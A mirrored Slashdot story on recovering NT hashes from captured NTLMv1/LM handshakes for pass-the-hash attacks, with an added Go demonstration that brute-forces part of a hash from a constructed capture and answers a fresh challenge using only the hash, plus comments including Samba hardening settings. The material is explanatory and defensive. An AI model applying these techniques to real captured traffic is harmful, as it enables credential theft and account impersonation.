Slashdot Mirror


NTLM 100% Broken Using Hashes Derived From Captures

New submitter uCallHimDrJ0NES writes "Security researcher Mark Gamache has used Moxie Marlinspike's Cloudcracker to derive hashes from captured NTLM handshakes, resulting in successful pass-the-hash attacks. It's been going on for a long time, probably, but this is the first time a 'white hat' has researched and exposed the how-to details for us all to enjoy. 'You might think that with all the papers and presentations, no one would be using NTLM...or, God forbid, LM. NTLMv2 has been around for quite some time. Surely, everyone is using it. Right? Wrong! According to the last data from the W3 Schools, 21% of computers are running XP, while NetMarketShare claims it is 39%. Unless someone has hardened these machines (no MS patches do this), these machines are sending LM and NTLM responses!' Microsoft has posted a little guidance for those who need to turn off NTLM. Have fun explaining your new security project to your management, server admins!"
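Why a captured NTLMv1 handshake gives up a password-equivalent hash, shown as an added Go example (this is illustration code written for this page, not code from the story, from Cloudcracker, or from Microsoft). It assumes Go's standard crypto/des, starts from the well-known NT hash of "password" because MD4 is not in the standard library, and uses arbitrary constructed challenge bytes; the function names are this example's own. It goes slightly beyond the story by also building the LM hash the same way and by showing the server-side check, which needs only the hash:

```go
package main

import (
	"bytes"
	"crypto/des"
	"fmt"
	"math/bits"
	"strings"
)

// Well-known NT hash of "password" (MD4 of its UTF-16LE encoding). MD4 is not
// in Go's standard library, so this constructed scenario starts from the hash.
var ntHashOfPassword = [16]byte{
	0x88, 0x46, 0xf7, 0xea, 0xee, 0x8f, 0xb1, 0x17,
	0xad, 0x06, 0xbd, 0xd8, 0x30, 0xb7, 0x58, 0x6c,
}

// desKeyFrom7 spreads 56 key bits over 8 bytes, one 7-bit chunk per byte,
// and writes DES odd parity into each byte's low bit (which DES ignores).
func desKeyFrom7(k []byte) []byte {
	var n uint64
	for _, b := range k {
		n = n<<8 | uint64(b)
	}
	key := make([]byte, 8)
	for i := range key {
		b := byte(n>>(49-7*i)&0x7F) << 1
		if bits.OnesCount8(b)%2 == 0 {
			b |= 1
		}
		key[i] = b
	}
	return key
}

// desEncrypt is one DES-ECB block under a 7-byte (56-bit) key.
func desEncrypt(key7, block []byte) []byte {
	c, _ := des.NewCipher(desKeyFrom7(key7)) // key is always 8 bytes, cannot fail
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// lmHash: uppercase, zero-pad or truncate to 14 bytes, and use each 7-byte
// half as a DES key over the constant "KGS!@#$%".
func lmHash(password string) [16]byte {
	var pw [14]byte
	copy(pw[:], strings.ToUpper(password))
	var h [16]byte
	copy(h[:8], desEncrypt(pw[:7], []byte("KGS!@#$%")))
	copy(h[8:], desEncrypt(pw[7:], []byte("KGS!@#$%")))
	return h
}

// ntlmv1Response: the NT hash is zero-padded to 21 bytes and split into three
// 7-byte DES keys, each encrypting the same 8-byte server challenge.
func ntlmv1Response(ntHash [16]byte, challenge [8]byte) [24]byte {
	var k [21]byte
	copy(k[:], ntHash[:]) // k[16:21] stay zero: key 3 has only 16 unknown bits
	var resp [24]byte
	for i := 0; i < 3; i++ {
		copy(resp[8*i:], desEncrypt(k[7*i:7*i+7], challenge[:]))
	}
	return resp
}

// verifyNTLMv1 is the server's check; it needs the NT hash, not the password.
func verifyNTLMv1(ntHash [16]byte, challenge [8]byte, resp [24]byte) bool {
	return ntlmv1Response(ntHash, challenge) == resp
}

// recoverHashTail attacks block 3 of a captured exchange: its key is two hash
// bytes plus five known zeros, so 2^16 DES trials recover hash[14:16].
func recoverHashTail(challenge [8]byte, resp [24]byte) (tail [2]byte, ok bool) {
	var key7 [7]byte
	for v := 0; v < 1<<16; v++ {
		key7[0], key7[1] = byte(v>>8), byte(v)
		if bytes.Equal(desEncrypt(key7[:], challenge[:]), resp[16:24]) {
			return [2]byte{key7[0], key7[1]}, true
		}
	}
	return tail, false
}

func main() {
	// Constructed capture: an arbitrary server challenge and the client's reply.
	challenge := [8]byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef}
	resp := ntlmv1Response(ntHashOfPassword, challenge)
	fmt.Printf("captured NTLMv1 response: %x\n", resp)
	tail, _ := recoverHashTail(challenge, resp)
	fmt.Printf("hash[14:16] from block 3 after 2^16 trials: %x\n", tail)
	fmt.Println("hash[0:14] sits in two 56-bit keys over the same plaintext; one 2^56 DES sweep recovers both (the Cloudcracker step)")
	// Pass-the-hash: with the full NT hash, answer a brand-new challenge.
	fresh := [8]byte{0xde, 0xad, 0xbe, 0xef, 0x00, 0x11, 0x22, 0x33}
	fmt.Println("fresh challenge accepted with hash only:", verifyNTLMv1(ntHashOfPassword, fresh, ntlmv1Response(ntHashOfPassword, fresh)))
	fmt.Printf("LM hash of \"password\": %x\n", lmHash("password"))
}
```

The two things worth noticing: the third DES block leaks two hash bytes for the price of 65,536 trials on a laptop, and the remaining 14 bytes are two independent 56-bit DES keys applied to the same plaintext, so a single exhaustive DES sweep recovers both. Once the 16-byte NT hash is known there is no need to recover the password, because the server's own check (verifyNTLMv1 above) only ever uses the hash. NTLMv2 does not have this structure, which is why the story's advice is to turn NTLMv1 and LM off rather than to pick longer passwords.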

4 of 155 comments

  1. Re:And this is important because? by UnknownSoldier · · Score: 5, Informative

    NTLM stands for Windows NT LAN Manager. It was used in earlier Windows from NT 3.1 (yes THAT old) up until Win 2K3 IIRC.

    Users would authenticate their login credentials to the system. NTLM is the sub-system that does that authentication.

    For more details see wikipedia: http://en.wikipedia.org/wiki/NTLM

  2. Re:How to harden an XP machine ? by Dr.Who · · Score: 5, Informative
  3. Re:How to harden an XP machine ? by yuhong · · Score: 5, Informative
  4. Re:Here's why by arth1 · · Score: 5, Informative

    I'd say this affects Linux too - a bunch of machines with Samba are quite possibly vulnerable, and need a different settings change than what Windows does.
    At a minimum, the following in smb.conf:

    [global]
        # client side: only ever send NTLMv2 responses
        client ntlmv2 auth = yes
        # server side: refuse LM responses
        lanman auth = no
        # server side: refuse NTLMv1 responses; with lanman auth off, only NTLMv2 is left
        ntlm auth = no

    For winbindd, a recompile might be required.